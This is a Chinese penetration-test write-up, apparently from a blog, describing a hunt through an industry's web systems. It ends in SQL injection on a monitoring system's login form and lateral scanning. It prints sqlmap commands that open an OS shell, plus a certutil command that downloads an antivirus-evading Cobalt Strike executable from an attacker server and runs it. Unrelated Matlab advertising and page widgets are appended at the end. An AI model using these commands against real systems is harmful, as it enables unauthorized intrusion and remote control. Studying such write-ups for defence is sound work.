记一次从登录框到内网横向

前言

接到公司通知要对某某行业做渗透测试,挖一些尽可能高危的漏洞,于是便有了接下来的故事。

0x01 信息收集
首先收集了十几个该行业相关的网站,然后一个个做信息收集,先列出来可利用的点。

1.某某公司为YouDianCMS(可能存在注入)。

2.某集团OA,使用的是通达OA。

3.某管理系统,存在登录框,无验证码。

4.某监控管理系统,存在登录框,无验证码。5.某收费系统,使用的是若依管理系统。


0x02 漏洞利用

1.通达OA

习惯性先试一下通达OA,通达OA的利用工具比较方便,若存在漏洞可以一键getshell,不过利用失败了。

2.测试YouDianCMS

之前收集的youdianCMS的sql注入的POC,直接利用,但是还是不存在该漏洞。

3.测试若依管理系统

1)测试默认口令:admin/admin123,失败。

2)测试shiro反序列化漏洞。

均失败了。

4.测试某管理系统

爆破密码。爆出来了弱口令admin/456123,但是登录进去后找了一圈没有geshell的点,一个弱口令肯定没法交差。

5.测试某监控管理系统的登录框

最后一个点了,再不行要重新打点了,本来也没报什么希望,登录框做渗透测试几乎没挖到过什么大的漏洞。

首先测试弱口令,爆破了一圈没有弱口令,扫目录也没扫出什么东西,JS代码里也没泄露有用的信息,突然想到还没试注入,这一试,果然有问题。

当参数loginName的值后边修改为and'q'='q"时,页面返回密码错误,修改为and'u'='k"时,页面返回用户不存在,说明页面存在布尔盲注。

sqlmap一把梭:

sqlmap.py -r 1.txt --dbs --random-agent --proxy=http://127.0.0.1:7890

跑出来了数据库,但是跑表的时候出错了,不知道为什么跑不出来。

直接获取shell试试:

sqlmap.py -r 1.txt --os-shell --random-agent --proxy=http://127.0.0.1:7890

可以执行命令,但是回显的巨慢。

本来想着已经成功了,接下来的拿shell就水到渠成,没想到又曲折了一番。

1.CS直接生成powershell命令,然后令目标系统执行,执行完毕一直没上线,然后想着让sqlmap回显一下看看有什么问题,等了十几分钟页面才回显完,应该是有杀软,页面返回的是“检测到该命令为危险命令”,就给拦截了。

2.直接生成exe肯定也不行,这时候就要让大佬帮忙了。

免杀马到手,Windows通过certutil命令进行远程下载。先把免杀马上传到VPS上,然后开一个http服务。然后在shell中执行:

certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe dll.exe

然后直接通过命令运行:

dll.exe

这回想着肯定能成功,结果等了半天还是没反应,一脸懵逼,看了下VPS,有下载记录呀。

难道被sha了?

想执行一下dir看看目录下有没有该文件,但是目录下有几百个文件,要等全部都回显要等半小时。

最后想了想是不是该目录下没有权限,于是在目标系统的D盘新建一个dll文件夹,然后把免杀马写到这里。

certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe d:\dll\dll.exe

然后执行:

d:\dll\dll.exe

终于成功上线。

0x03 横向攻击

看一下目标机器有哪些敏感文件可利用,收获颇丰呀。

fscan横向一波,发现了几个站点,但是没有扫到能直接利用的漏洞。

由于领导说的只是让挖到漏洞,所以要问下领导能否进行横向攻击,先点到为止。

0x04 总结

之前做渗透每次遇到登录框都比较头疼,因为登录框可利用的点比较少,也没在登录框上挖到过什么大的漏洞,但是本次运气还是比较好的,总算可以交差了。

CSDN海神之光上传的代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b或2023b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪(CEEMDAN)、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信 1. EMD(经验模态分解,Empirical Mode Decomposition) 2. TVF-EMD(时变滤波的经验模态分解,Time-Varying Filtered Empirical Mode Decomposition) 3. EEMD(集成经验模态分解,Ensemble Empirical Mode Decomposition) 4. VMD(变分模态分解,Variational Mode Decomposition) 5. CEEMDAN(完全自适应噪声集合经验模态分解,Complementary Ensemble Empirical Mode Decomposition with Adaptive Noise) 6. LMD(局部均值分解,Local Mean Decomposition) 7. RLMD(鲁棒局部均值分解, Robust Local Mean Decomposition) 8. ITD(固有时间尺度分解,Intrinsic Time Decomposition) 9. SVMD(逐次变分模态分解,Sequential Variational Mode Decomposition) 10. ICEEMDAN(改进的完全自适应噪声集合经验模态分解,Improved Complementary Ensemble Empirical Mode Decomposition with Adaptive Noise) 11. FMD(特征模式分解,Feature Mode Decomposition) 12. REMD(鲁棒经验模态分解,Robust Empirical Mode Decomposition) 13. SGMD(辛几何模态分解,Spectral-Grouping-based Mode Decomposition) 14. RLMD(鲁棒局部均值分解,Robust Intrinsic Time Decomposition) 15. ESMD(极点对称模态分解, extreme-point symmetric mode decomposition) 16. CEEMD(互补集合经验模态分解,Complementary Ensemble Empirical Mode Decomposition) 17. SSA(奇异谱分析,Singular Spectrum Analysis) 18. SWD(群分解,Swarm Decomposition) 19. RPSEMD(再生相移正弦辅助经验模态分解,Regenerated Phase-shifted Sinusoids assisted Empirical Mode Decomposition) 20. EWT(经验小波变换,Empirical Wavelet Transform) 21. DWT(离散小波变换,Discraete wavelet transform) 22. TDD(时域分解,Time Domain Decomposition) 23. MODWT(最大重叠离散小波变换,Maximal Overlap Discrete Wavelet Transform) 24. MEMD(多元经验模态分解,Multivariate Empirical Mode Decomposition) 25. MVMD(多元变分模态分解,Multivariate Variational Mode Decomposition)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值